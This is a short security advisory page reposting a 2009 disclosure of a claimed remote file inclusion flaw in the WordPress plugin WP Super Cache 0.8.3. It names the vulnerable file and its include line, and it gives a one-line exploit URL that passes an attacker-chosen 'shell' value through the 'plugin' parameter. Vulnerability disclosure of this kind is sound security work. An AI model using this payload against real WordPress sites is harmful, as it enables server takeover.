Computer Security

Security Advisory: wordpress plugins WP Super Cache v0.8.3 Remote File Inclusion Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Insufficient Authentication, XSS and SQL Injection vulnerabilities in XAMPP

  Phorum : Permanent Cross-Site Scripting Vulnerabilities

From:Cru3l.b0y <Cru3l.b0y_(at)_gmail.com>
Date:23.07.2009
Subject:wordpress plugins WP Super Cache v0.8.3 Remote File Inclusion Vulnerability

=================================================================================
==========


 [o] wordpress plugins WP Super Cache v0.8.3 Remote File Inclusion
Vulnerability

      Software     :  WP Super Cache v0.8.3
      Vendor       :  http://wordpress.org/
      Download     :
http://downloads.wordpress.org/plugin/wp-super-cache.0.8.3.zip
      Author       :  Cru3l.b0y
      Home         :  WwW.DeltaHacking.Net
      Description  :  A very fast caching engine for WordPress that
produces static html files.
=================================================================================
==========

 [o] Vulnerable file

        wp-cache-phase1.php

               require_once( $plugin );
       
       
 [o] Exploit

           http://localhost/[path]/wp-cache-phase1.php?plugin=shell
          
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server